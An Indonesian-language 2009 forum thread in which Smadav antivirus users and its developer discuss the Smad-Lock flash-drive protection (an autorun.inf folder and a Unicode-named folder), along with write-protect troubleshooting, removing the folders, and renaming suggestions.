Ga susah kan........??? :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: darkzeus pada Oktober 09, 2009, 10:49:26 AM
^^

:D sip..

btw emang conficker infeksi file apa?? :hammer:

klo g salah proteksi folder smadav, pake kode ASCII kan??  :P
memang untuk saat ini masih aman, karena vmaker lokal blum melirik kesana... :D
kita tunggu saja, bagaimana proteksi selanjutnya....
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 09, 2009, 10:54:53 AM
^^

:D sip..

btw emang conficker infeksi file apa?? :hammer:

klo g salah proteksi folder smadav, pake kode ASCII kan??  :P
memang untuk saat ini masih aman, karena vmaker lokal blum melirik kesana... :D
kita tunggu saja, bagaimana proteksi selanjutnya....

Si BOS bikin tuch folder pake UNICODE.....
Dan virus2 indo blum ada yg support unicode......
Tapi g bisa dijelasin secara rinci ,takut ada VMaker yg usil......
Sampe sekarang yg udah g coba ma koleksi virus punya g n warnet yg udah hancur lebur ma virus ;D ;D ;D, ga ada yg bisa membobol tuch folder......... =)) =)) =))
Jadi tetp SECURE tuh folder kalo kita simpan data kita.........
Tenang aja, kalo ada yg bisa masuk,berarti SENGAJA DIMASUKIN ma yg punya FD..........WKWKWKWKWK...........Maaf OOT...
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 09, 2009, 02:37:53 PM
saya tidak membuat folder recycer tetapi membuat file dengan nma recycler...  :D
mungkin anda punya solusi lebih bagi nubie seperti saya :D

Y bner mas mmang gtu konsep sderhana untuk mmblok fungsi CreateFile/Folder, blok File dgn Folder, dan blok Folder dgn File cz tdk boleh dlm 1 lokasi ad nm yg sma..
Krn Conflicker mmbwt Folder Recycler jd qta bwt File Recycler... :D tp brhasil g cra ini?blm prnah coba soalnya...
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 09, 2009, 02:52:46 PM
Si BOS bikin tuch folder pake UNICODE.....
Dan virus2 indo blum ada yg support unicode......

blum ada <> tidak ada... :P
tp mank cara ini udh cukup ampuh bwt mnangkal virus lokal..  :D

Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 12, 2009, 10:35:17 AM
Bro.......zai
Smad-Lock smadav dengan autorunnya ga bisa kombinasiin ama punya PANDA USB VACCINE ya???
Kalo udah di vaccin ma PANDA di statusnya smadav di FD jadi UNLOCK...
Kalo gitu, g mau nanya apakah PROTEKSI folder Δ Smad-Lock Δ masih berfungsi atau gmana???
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Oktober 12, 2009, 01:46:26 PM
Si BOS bikin tuch folder pake UNICODE.....
Dan virus2 indo blum ada yg support unicode......

blum ada <> tidak ada... :P
tp mank cara ini udh cukup ampuh bwt mnangkal virus lokal..  :D



salah satu Kelebihan smadv dibanding AV lokal lainnya..
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 12, 2009, 06:02:54 PM
Folder dengan huruf Unicode benar-benar "ampuh" (dengan tanda petik! ;> ), ACDSee saja gagal mendeteksi foto di folder tersebut ;D :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 12, 2009, 06:41:56 PM
Folder dengan huruf Unicode benar-benar "ampuh" (dengan tanda petik! ;> ), ACDSee saja gagal mendeteksi foto di folder tersebut ;D :-bd
Sangat bagus buat nyimpan data2 penting........
TOP buat smadav, blum ada AV tetangga yg bisa punya banyak kreasi2 jitu dalam menghadang virus.....
Salut g....... :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 12, 2009, 06:46:51 PM
Folder dengan huruf Unicode benar-benar "ampuh" (dengan tanda petik! ;> ), ACDSee saja gagal mendeteksi foto di folder tersebut ;D :-bd
Sangat bagus buat nyimpan data2 penting........
TOP buat smadav, blum ada AV tetangga yg bisa punya banyak kreasi2 jitu dalam menghadang virus.....
Salut g....... :-bd :-bd :-bd

Folder Smad-Lock memang hanya diperuntukkan untuk file-file yang dibuka dengan program buatan microsoft, seperti office, explorer, notepad, dll. Hanya sedikit program non-microsoft yang bisa membuka file dalam folder Smad-Lock. :D
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 12, 2009, 06:49:40 PM
Folder dengan huruf Unicode benar-benar "ampuh" (dengan tanda petik! ;> ), ACDSee saja gagal mendeteksi foto di folder tersebut ;D :-bd
Sangat bagus buat nyimpan data2 penting........
TOP buat smadav, blum ada AV tetangga yg bisa punya banyak kreasi2 jitu dalam menghadang virus.....
Salut g....... :-bd :-bd :-bd

Folder Smad-Lock memang hanya diperuntukkan untuk file-file yang dibuka dengan program buatan microsoft, seperti office, explorer, notepad, dll. Hanya sedikit program non-microsoft yang bisa membuka file dalam folder Smad-Lock. :D
Tapi semua file2 g simpan di folder itu bro.......
Kalo mau dipakai kan tinggal COPAS ke luar.....
Keren, selama g simpan semua data di folder itu GA ADA VIRUS yg bisa masuk dengan sendirinya........
TOP dah buat smadav.............
Judul: Re: Smad-Lock
Ditulis oleh: MiloMen™ pada Oktober 12, 2009, 06:56:39 PM
Folder Smad-Lock memang hanya diperuntukkan untuk file-file yang dibuka dengan program buatan microsoft, seperti office, explorer, notepad, dll. Hanya sedikit program non-microsoft yang bisa membuka file dalam folder Smad-Lock. :D

Wah kalo gt memang hebat Smad-Lock nya. :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 12, 2009, 06:59:21 PM
Folder Smad-Lock memang hanya diperuntukkan untuk file-file yang dibuka dengan program buatan microsoft, seperti office, explorer, notepad, dll. Hanya sedikit program non-microsoft yang bisa membuka file dalam folder Smad-Lock. :D

Wah kalo gt memang hebat Smad-Lock nya. :-bd :-bd
Bro zai emang jeli dalam melihat hal2 seperti itu....
Thanks bro....... :-bd
Judul: Re: Smad-Lock
Ditulis oleh: teambuddies pada Oktober 12, 2009, 07:33:04 PM
Lho, smad-lock bisa buat folder dan autorun nggak?
pemula...
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 12, 2009, 08:32:52 PM
Lho, smad-lock bisa buat folder dan autorun nggak?
pemula...
Smadav bikin folder Δ Smad-Lock Δ : Buat nyimpan data
dan
autorun.inf : buat ngehadang virus bikin auturun.inf di FD
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Oktober 12, 2009, 08:37:47 PM
Folder dengan huruf Unicode benar-benar "ampuh" (dengan tanda petik! ;> ), ACDSee saja gagal mendeteksi foto di folder tersebut ;D :-bd
Sangat bagus buat nyimpan data2 penting........
TOP buat smadav, blum ada AV tetangga yg bisa punya banyak kreasi2 jitu dalam menghadang virus.....
Salut g....... :-bd :-bd :-bd

Folder Smad-Lock memang hanya diperuntukkan untuk file-file yang dibuka dengan program buatan microsoft, seperti office, explorer, notepad, dll. Hanya sedikit program non-microsoft yang bisa membuka file dalam folder Smad-Lock. :D

tapi sewaktu update/install smadv rev terbaru...data akan hilang ???
Judul: Re: Smad-Lock
Ditulis oleh: KhariZet pada Oktober 13, 2009, 09:58:39 PM
trus file yang di smad lock itu bisa di cut gak? trus ngapus file di dalemnya gimana?
Judul: Re: Smad-Lock
Ditulis oleh: arifinsetiadi pada Oktober 13, 2009, 10:05:03 PM
ada gx virus yang bisa masuk folder smad lock????
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 14, 2009, 08:18:28 AM
ada gx virus yang bisa masuk folder smad lock????
Baca postingan sebelumnya.........
Virus sampe sekarang blum ada yg bisa masuk dengan sengaja ke foldernya smadav
Judul: Re: Smad-Lock
Ditulis oleh: KhariZet pada Oktober 14, 2009, 09:11:49 AM
ada usulan nih mas Zai, bisa gak kalo nanti Autorun.inf smad-lock nati di veris berikutnya dibikin bisa diedit, tp cm pake smadav ngeditnya?
soalnya pengen nambahin icon dan lain2 bwat gaya2an  :D
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada Oktober 14, 2009, 11:36:14 PM
ada usulan nih mas Zai, bisa gak kalo nanti Autorun.inf smad-lock nati di veris berikutnya dibikin bisa diedit, tp cm pake smadav ngeditnya?
soalnya pengen nambahin icon dan lain2 bwat gaya2an  :D

Hmmm gaya2an... virus juga ada yang gaya2an kaya brontok yang terkenal sampe luar negeri... asli itu begaya abis... so mo fungsi apa kecantikan... hmmmm ;) ;)
Judul: Re: Smad-Lock
Ditulis oleh: Network Timeout pada Oktober 15, 2009, 05:05:35 PM
ada usulan nih mas Zai, bisa gak kalo nanti Autorun.inf smad-lock nati di veris berikutnya dibikin bisa diedit, tp cm pake smadav ngeditnya?
soalnya pengen nambahin icon dan lain2 bwat gaya2an  :D

Setuju. Gue juga pengen.
Satu lagi. Di Windows 7, flashdisk yang di smad-lock label-nya selalu "Removable Disk" (abis diganti, tulisannya tetep "Removable Disk"). Itu emang bug-nya Win7 ato smad-lock-nya ya?
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 15, 2009, 05:54:14 PM
ada usulan nih mas Zai, bisa gak kalo nanti Autorun.inf smad-lock nati di veris berikutnya dibikin bisa diedit, tp cm pake smadav ngeditnya?
soalnya pengen nambahin icon dan lain2 bwat gaya2an  :D

ngedit gmna? klo mw ganti icon tinggal ubah file desktop.ini di dlm folder autorun.inf nya kn..
tp jg foldernya sngaja di set hidden+system toh dignti pun ttp ga ad yg ngeliat...

klo mw jg folder unicode nya yg di ksh icon,, hahaha... :D
Judul: Re: Smad-Lock
Ditulis oleh: MiloMen™ pada Oktober 15, 2009, 06:00:56 PM
ada usulan nih mas Zai, bisa gak kalo nanti Autorun.inf smad-lock nati di veris berikutnya dibikin bisa diedit, tp cm pake smadav ngeditnya?
soalnya pengen nambahin icon dan lain2 bwat gaya2an  :D

Sepertinya tidak mukin bro.. :D
Judul: Re: Smad-Lock
Ditulis oleh: ViGunZ pada Oktober 15, 2009, 06:02:01 PM
iyach kayaknya ngak mungkin kan untuk secure  :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 15, 2009, 08:10:16 PM
UNICODE Folder
dibuat pke AutoIt (iseng aj nyobain bqn pke ini,bru tw soalnya..hehe) tpi syang pas dicompile+compress jd gde bner (278kb),.. :D

fungsi : 1 klik bwt nambahin 1 karakter unicode di tiap folder scra otomatis, mmbuat folder autorun.inf, automove file ke folder DATA..  :-bd

FOR FLASHDISK ONLY,, silakan donlod  ;) ;) ;)




Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 15, 2009, 08:15:58 PM
Membuat folder Unicode: tambahkan karakter ini ke folder Anda:

Δ

=)) ;D :D Hehehe... tapi ampuh dari virus selayaknya folder Δ Smad-Lock Δ. :-bd
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 15, 2009, 08:28:21 PM
pngecualian untuk folder autorun.inf, folder unicode smadlock(slama ga direname) n file desktop.ini..

ide: tmn ada yg data ilang smwa di FD gra2 ga sngaja ke delete folder smadlock nya (kbtulan dy naro smw file+foldernya di 1 folder smadlock,jd lgsung ilang smwa) bgus dya pnya backup.. nah dari situ dibqn tool kecil ini..


saran mas zai utk folder smadlock didlmnya dibuat 1 file/folder con/aux/nul biar ga bs gmpang di delete dgn cra biasa..cz resikonya klo qta naro file+folder di 1 folder induk(bca:folder smadlock) klo folder ini keapus mk lgsung keapus smwa isi nya...
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 15, 2009, 11:07:30 PM
@amir
y bsa jg klo mw manual tmbahin krakter ini Δ (copy-rename-paste),,
sya cm bqn biar praktis (1 klik bwt set smwa folder di root ditmbah 1 krakter unicode diblakangnya) jd ga hrus/melulu smwa file qta msukin ke folder Δ Smad-Lock Δ (resikonya tkut ga sngaja ke apus kya tmn sya or file corrupt)..klo bsa smwa knpa cm 1....hehehe
n fungsi automove file klo males copy-paste/ mndah2in file

krakter unicode ga cm ini Δ doank lho, ada bnyak..☺❀❃
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 15, 2009, 11:16:28 PM
@izul
Yup bener, kreatif juga  :-bd
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 02:21:57 PM
@Zai
y mas soalnya klo user awam kdg msh ga tw klo qta blg tmbhin krakter unicode di nma foldernya,jd bngung sndri mlah.. ???

wkt sya tes di komp kmpus yg ad vrusnya jg brhsil, di FD cm kdetek virus di folder autorun.inf doank,pdhal isi fdnya ad ratusan file n folder.. :-bd

sbnrnya dgn cra ini (folder unicode+autorun.inf) sdh bs dblg sangat aman & ckup bwt mmutus pnyebaran virus di indo (VM nya pda mati kutu bqn virus suport unicode, hehehe).. :D
Judul: Re: Smad-Lock
Ditulis oleh: dudull pada Oktober 16, 2009, 05:20:26 PM
sy bru pake smadav, yang 6.4. trus skrg jadi ga bisa ngesave data dari komputer ke flash disk  :(. slalu ada tulisan "write-protected". knpa yaa?? ato karna smad-lock jadi ke protected??? soalnya smad-lock nya ga bisa d unlock. tlong bantu solusinya ya.. emergency nihh.. lagi nyk tugas. thx  ;)
Judul: Re: Smad-Lock
Ditulis oleh: dudull pada Oktober 16, 2009, 05:35:03 PM
iyah.. sama! gw jg kya gitu. ga bisa diapa-apain lagii. bingung caranya gmanaaaa.... :(
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 05:38:14 PM
kasusnya cuma di FD yg skarang dipke doank (1 FD) ato smwa FD yg dicolok jd ga bs save ? ???
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 05:52:45 PM
sy bru pake smadav, yang 6.4. trus skrg jadi ga bisa ngesave data dari komputer ke flash disk  :(. slalu ada tulisan "write-protected". knpa yaa?? ato karna smad-lock jadi ke protected??? soalnya smad-lock nya ga bisa d unlock. tlong bantu solusinya ya.. emergency nihh.. lagi nyk tugas. thx  ;)

coba donlod file attchment di bwah ini trus jalanin...  ;)
Judul: Re: Smad-Lock
Ditulis oleh: dudull pada Oktober 16, 2009, 05:57:58 PM
trus dah gitu di gimanain lagi ?? masih awam nihh.. :)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 05:59:58 PM
lapor mas zai smadav blm mndteksi key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect

sbgai key yg rusak, tlong ditmbahkan ke databsenya krna mmbwt komp WriteProtect g bs save ke ke FD... :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 06:01:26 PM
klo udh didonlod trus jlanin filenya,pilih Yes...n shrusnya dah bs skarang klo cma krena setingan registry..
Judul: Re: Smad-Lock
Ditulis oleh: dudull pada Oktober 16, 2009, 07:53:44 PM
Udah d download & udah di 'YES' .
Sblmnya ga muncul "storage device policies" - nya. Tp skrg dah muncul. Di dalemnya ada : (Default) & WriteProtect.
Dah gt gmn lg? Soalnya ttep ga bs ngesave data ke flashdisk.
Klo WriteProtect di klik muncul base "Edit DWord Value". Nah, perlu diisi ga?
Thx b4..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 08:05:54 PM
Duh ko jd ribet gtu y,wndowsnya ap si?
Ga prlu diisi.klo mw diisi,isi nilai nol aj

ksus ini cma di FD yg skarang doank ato smwa FD ga bs di save??
Judul: Re: Smad-Lock
Ditulis oleh: dudull pada Oktober 16, 2009, 09:41:35 PM
Windows XP.
Kasus nya bkn FD ini ajah. Udah 2 FD..
Sblumnya udah ada 4 FD yg prnah msuk,, yg 2 ga apa apa,, tp yg 2 lainnya kena 'protected' stlah scan otomatis.
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 10:10:53 PM
kynya bkn cm setingan registry ni, msih ga bsa y pke cra diatas?  :-\
untuk nilai Dword pda WriteProtect diisi nol (0) y jgn 1..

udh coba di kompt laen blm FD nya?bisa ga?
cba pke ubuntu aj klo mw ngmbil data nya..

kasusnya nya ky gni bkn..
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 16, 2009, 10:25:44 PM
Aneh juga, menurut teori seharusnya tidak ada hubungannya antara Smad-Lock dan write-protected karena yang dilakukan Smad-Lock hanya membuat folder biasa dan tidak merubah struktur removable media/flashdisk itu.

@dudull
Saya prediksi ini mungkin kesalahan hardware USB-nya, apa merk USB-nya?
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 16, 2009, 10:27:18 PM
Aneh juga, menurut teori seharusnya tidak ada hubungannya antara Smad-Lock dan write-protected karena yang dilakukan Smad-Lock hanya membuat folder biasa dan tidak merubah struktur removable media/flashdisk itu.

@dudull
Saya prediksi ini mungkin kesalahan hardware USB-nya, apa merk USB-nya?
Bener apa kata bro zai........
Mungkin errornya dari FD kali... :(
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 16, 2009, 10:36:57 PM
y bner, kmungkinan krusakan hardware..awalnya sya kira cuma krena registry di WriteProtect
tp td ad yg nanya jg dgn kasus yg sma http://forum.smadav.net/index.php?topic=1511.0
kynya sering jg kassu ky gni..
Judul: Re: Smad-Lock
Ditulis oleh: king_of_fighter_xii pada Oktober 16, 2009, 11:46:38 PM
Bagaimana cara menghilangkan atau mendelete total folder smad lock di flash disk?
itu sangat mengganggu saya. seharusnya pada program smadav ada fitur untuk mendelete smad lock pada flash disk yang dikehendaki.
Judul: Re: Smad-Lock
Ditulis oleh: dudull pada Oktober 17, 2009, 08:40:34 AM
@ izul :
iya. udah prnah coba di komputer2 warnet, tp ttp sama aja.. smad-locknya jg ga bs d unlock.
YAP !! Bener bgt! Kaya gitu kasusnya (gambar td)  :-X
wah, trnyata ada ksus yg sama, sama2 ga bs d format.. tp ga aneh2 pake dos sgala mcem.. :D
thx.

@ zai :
fd nya 'silicon-power' yg 2GB.
brmsalah ga y?
thx.
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 17, 2009, 09:28:31 AM
Bagaimana cara menghilangkan atau mendelete total folder smad lock di flash disk?
itu sangat mengganggu saya. seharusnya pada program smadav ada fitur untuk mendelete smad lock pada flash disk yang dikehendaki.

Ada di tab Tools > Smad-Lock. Pilih drive flashdisk yang mau di-UNLOCK lalu klik Unlock. ;)
Judul: Re: Smad-Lock
Ditulis oleh: marsyofie pada Oktober 22, 2009, 01:39:01 PM
kenapa smadav di deteksi virus ama kaspersky ??? :-\ :-\
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 22, 2009, 04:47:12 PM
kenapa smadav di deteksi virus ama kaspersky ??? :-\ :-\

Tambahkan saja ke Exception List Kaspersky. Back to topic ;)
Judul: Re: Smad-Lock
Ditulis oleh: darkbite pada Oktober 25, 2009, 11:36:08 PM
4. Kinerja smad-lock. pertama2 saya agak sepele, krna folder smad-lock gampang di delete, tapi setelah liat folder autorun.inf baru percaya, virus ini ga bsa menambah kan autorun.inf krna uda ada autorun,inf tpi berupa folder*keknya teknik ini pernah saya baca di blog org* dan untuk mendelete file tsb harus memformat fd  :D

Smad-Lock memang sangat sulit di-delete, Semua program (termasuk virus) juga tidak bisa men-delete folder autorun.inf ini dengan cara biasa, ada cara khusus yang cukup rumit untuk men-delete-nya.

gan, folder autorun.inf bisa dihapus dgn mudah lewat software unlocker - http://ccollomb.free.fr/unlocker
Judul: bagaimana dan buat apa menghapus Smad-Lock?
Ditulis oleh: Zai pada Oktober 26, 2009, 12:50:20 AM
Karena akhir-akhir ini ada beberapa orang yang mengkritik Smad-Lock maka saya buat pernyataan berikut :

Kutip
Yang harus anda ketahui, saya bukan pengguna SMADAV, dan saya merasa tergganggu dengan sistem proteksi SMADAV yang diciptakan oleh pengguna SMADAV, tanpa mereka sadari konsekuensi dari penggunaan sistem proteksi SMADAV, dan yang dibuat tanpa persetujuan saya.

SMADAV tidak memberikan notifikasi tentang penggunaan dan resiko penggunaan proteksi SMADAV. SMADAV juga tidak meninggalkan catatan teknis dan atau applikasi untuk menghilangkan sistem proteksi tersebut.

Banyak dari non-SMADAV kebingungan dengan adanya file/folder yang tidak dapat dihapus. Sebagian besar user non-SMADAV user sempat dibuat panik dan takut.
Smadav sudah memberikan notifikasi dan catatan yang cukup dalam folder Smad-Lock pada file Read Me. Catatan teknis yang lebih detail mungkin di Revisi berikutnya akan ditambahkan di file Read Me tersebut.

Kutip
SMADAV berusaha membuat sistem proteksi yang hanya dapat dihilangkan oleh SMADAV, via promosi internal.
Setiap kali non-SMADAV user akan menghapus autorun.inf, pasti muncul pesan, akan adanya sistem proteksi yang dibuat oleh SMADAV, tanpa cara teknis lengkap menghilangan proteksi tersebut tanpa harus menggunakan SMADAV. Hal ini menyebabkan non-SMADAV user menginstall SMADAV karena terpaksa, hanya untuk menghilangan autorun.inf buatan SMADAV.
Harus diperhatikan bahwa folder autorun.inf itu memiliki atribut system+hidden jadi tidak akan membuat bingung user awam karena komputer di user awam kebanyakan tidak menampilkan file system+hidden. Hanya komputer advanced user saja yang kebanyakan menampilkan file system+hidden, dan mereka sebagian besar sudah tahu gunanya folder autorun.inf.

Kutip
Dalam tulisan yang ditampilkan menyatakan secara umum bahwa sistem proteksi yang diciptakan SMADAV untuk melindungi pengguna Flash Disk dari serangan Virus.

SMADAV menciptakan proteksi ini hanya untuk pengguna SMADAV dan TIDAK untuk non-SMADAV user. Tetapi non-SMADAV user dipaksa untuk ikut terlibat dalam sistem proteksi SMADAV tanpa mereka inginkan.
Perlu diketahui, Windows 7 sudah tidak menggunakan dan mengabaikan file autorun.inf di removable disk. Sebenarnya fitur autorun.inf di removable disk sudah banyak dikritik oleh pengguna Windows XP karena sangat berbahaya dan menjadi celah yang sangat bagus bagi virus, Smadav hanya ingin memutus rantai virus yang sebagian besar di Indonesia menyebar luas lewat autorun.inf. Jadi sangat tidak direkomendasikan untuk menghapus folder autorun.inf buatan Smadav.

Kutip
autorun.inf TIDAK bisa melindungi user dari serangan malware, seperti virus.
Sampai saat ini hampir semua virus (99%) tidak mampu menghapus folder autorun.inf Smadav.

Saya menyadari ada yang kontra dengan Smad-Lock walaupun hanya sebagian kecil saja. Tapi mohon dimengerti bahwa misi Smadav sebenarnya hanyalah untuk mengurangi secara signifikan penyebaran virus di Indonesia dan akhirnya akan kita dapatkan keamanan yang tinggi pada komputer-komputer di Indonesia, baik untuk pengguna online dan yang sebagian besar offline di Indonesia.
Judul: Re: Smad-Lock
Ditulis oleh: RefrizaL pada Oktober 26, 2009, 01:30:28 AM
ngeri, quotenya mas zai,. byk yg sinis,,.. mungkin cuma gara2 gak bisa format FD doank sewotnya minta ampun... mungkin mas zai perlu menambahkan keterangan: "barang siapa non-smadav user mencolokkan FD ke kompie user smadav, maka HARUS menerima konsekuensi pengamanan yang dipilih pemilik kompie bersangkutan" :D

"dikasih virus ngamuk2,, dikasi autorun.inf juga ngamuk2,.."
mungkin di dalam folder autorun.inf perlu diberi background, klo "folder ini adalah proteksi dari Virus".. gmn mas zai?
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 26, 2009, 05:34:39 AM
Smad-Lock akan ganti nama di Rev. 8 karena banyak kesalahpahaman yang terjadi di user awam yang menganggap Smad-Lock bisa mengunci FD mereka :)

Mungkin nanti namanya Smad-Vaccine saja

Dan folder menjadi "Δ Smad-Lock Δ" akan di-rename menjadi "[BRANKAS] SMADΔV"

atau ada usul lain? :D
Judul: Re: Smad-Lock
Ditulis oleh: MiloMen™ pada Oktober 26, 2009, 05:53:39 AM
Saya ada usul,

Smad-Clean :)
Gimana kalo "Δ Smad-Lock Δ" menjadi "Smad-Berkas" ;)
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Oktober 26, 2009, 05:55:42 AM
Aneh2 aja tu kritikanya!

Temen q juga pada ribut saat ada 2 folder baru di FD nya!katanya yg 1 gak bisa di hapus(autorun.inf) yg 1 gak penting (smad-lock)

mas zai,gimana kalo fitur smad-lock yg autorun.inf dan 4smad-lock4 di pisah di pengaturanya...

Banyak temen q yang pake smadav setiap FD nya di tancepin di kompinya,folder smad lock nya langsung di hapus,katanya g penting
isinya cuman read-me
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Oktober 26, 2009, 05:59:08 AM
Saya ada usul,

Smad-Clean :)
Gimana kalo "Δ Smad-Lock Δ" menjadi "Smad-Berkas" ;)


saya usul nama "Smad-Office"

kan untuk melindungi file,file Ms.office?
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 26, 2009, 06:04:55 AM
Banyak yang menyangka Write-Protected pada FD gara-gara Smad-Lock, padahal sama sekali gak ada hubungannya. Penyebab dan solusinya bisa dibaca disini : http://rhesa.itvps.net/node/26
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada Oktober 26, 2009, 06:21:12 AM
Ternyata write protected karna asal cabut FD tanpa savely removeble/ejec

pantes aja aku g pernah ngalamin write protected di FD,aku kn rajin ejec/savely removeble
Judul: Re: Smad-Lock
Ditulis oleh: valen1701 pada Oktober 26, 2009, 08:04:10 AM
iya sy juga selalu dengan klik safety removeable,kecuali klo terpaksa langsung cabut krn ndk bs di safety (generic volume cannot be stopped) pdhl dah ndk ada aplikasi yg aktif
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 26, 2009, 08:42:34 AM
Pada dasarnya smadav dibuat untuk melindungi data user dari virus.......
Konsekuensi adanya autorun.inf dan folder smad-lock milik smadav tidak seharusnya menjadi masalah yg harus dipersoalkan.
Smadav hanya membantu user agar bisa mencegah penyebaran virus di komputer, tetapi kenapa masih aja ada yg komplain tentang masalah ini !!!
Apabila user yg tidak menginginkan adanya kedua folder milik smadav di FD atau di HDD, maka dapat menghapusnya dengan UNLOCKER dan kemudian dapat menghapusnya..............
Yg mau g tanyakan kepada USER yg suka komplain ke smadav.....!!!!
Apa sih RIBETnya kalo ada 2 file buatan smadav di FD???
Apa karena BESAR FILENYA 1 GB atau apa????
Hanya beberapa KB kan???
Kok dipersoalkan.......... ;D ;D ;D ;D
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada Oktober 26, 2009, 09:09:53 AM
Pada dasarnya smadav dibuat untuk melindungi data user dari virus.......
Konsekuensi adanya autorun.inf dan folder smad-lock milik smadav tidak seharusnya menjadi masalah yg harus dipersoalkan.
Smadav hanya membantu user agar bisa mencegah penyebaran virus di komputer, tetapi kenapa masih aja ada yg komplain tentang masalah ini !!!
Apabila user yg tidak menginginkan adanya kedua folder milik smadav di FD atau di HDD, maka dapat menghapusnya dengan UNLOCKER dan kemudian dapat menghapusnya..............
Yg mau g tanyakan kepada USER yg suka komplain ke smadav.....!!!!
Apa sih RIBETnya kalo ada 2 file buatan smadav di FD???
Apa karena BESAR FILENYA 1 GB atau apa????
Hanya beberapa KB kan???
Kok dipersoalkan.......... ;D ;D ;D ;D


Bkn mslah kok dipersoalkan atau tdknya bro, tp emg mgkin pd dsarnya org itu dah hobi suka cari soal/ cari masalah hehehe....  =)) =)) =))
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 26, 2009, 11:23:28 AM
Mungkin pengkritik itu adalah orang yang sangat suka menggunakan autorun.inf sebagai customizer FD nya :D tentunya dengan mengabaikan keamanan dan jadi sangat vulnerable
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 26, 2009, 02:33:02 PM
 :D :D :D :D
Emang bener bro............
biasanya autorun.inf dibikin org buat ganti ICON FD mereka...
Tapi kan sama aja kalo dicolokin ke PC yg ada virusnya !!!  ;D ;D ;D
Mau sejuta kali bikin juga kalo si virus hapus ma sama aja......... ;D ;D ;D
Tinggal si user aja mau pilih yg mana............ :-bd
Proteksi VS Narsisan
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 26, 2009, 03:24:07 PM
Ya mklum lah kan g smwa org ngerti kgunaan fitur smadlock ini (mungkin readme nya msih krg jls mas..)

utk customizer fd sya lbh ska pke desktop.ini bwt backgound... :D
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada Oktober 26, 2009, 03:35:36 PM
Cuma ada gunanya juga gw pake autorun.inf... selain keren ada iconnya juga berguna untuk tau ada virusnya ngga komputer yang gw lagi pake... apalagi kalau lagi bersihin komputer clien... (teknisi gadungan wkwkwkwk... =))) nah kalau ketauan bervirus langsung jalanin master antivirusnya ... SmadAV  ;)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 26, 2009, 03:36:21 PM
Saya ada usul,

Smad-Clean :)
Gimana kalo "Δ Smad-Lock Δ" menjadi "Smad-Berkas" ;)


saya usul nama "Smad-Office"

kan untuk melindungi file,file Ms.office?

bgus juga Smad-Office.. ;D
ato bsa jg Smad-Document utk lbh umum..


utk yg sering bermaslah pas mw cabut FD, cba pke software ini..bgus,tpi syang trial bro..slakan cri sndiri biar full cz disini g blh share yg brbau piracy... hehe  :-bd ;D

http://ebsoft.web.id/2008/11/28/dapatkan-lisensi-gratis-usb-safety-remove-40/
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 26, 2009, 03:43:20 PM
4. Kinerja smad-lock. pertama2 saya agak sepele, krna folder smad-lock gampang di delete, tapi setelah liat folder autorun.inf baru percaya, virus ini ga bsa menambah kan autorun.inf krna uda ada autorun,inf tpi berupa folder*keknya teknik ini pernah saya baca di blog org* dan untuk mendelete file tsb harus memformat fd  :D

Smad-Lock memang sangat sulit di-delete, Semua program (termasuk virus) juga tidak bisa men-delete folder autorun.inf ini dengan cara biasa, ada cara khusus yang cukup rumit untuk men-delete-nya.

gan, folder autorun.inf bisa dihapus dgn mudah lewat software unlocker - http://ccollomb.free.fr/unlocker

coba pke ini http://forum.smadav.net/index.php?action=dlattach;topic=268.0;attach=830
klo mw biar ga bs diapus pke unlocker (kcuali di drive dgn file system NTFS) ;D
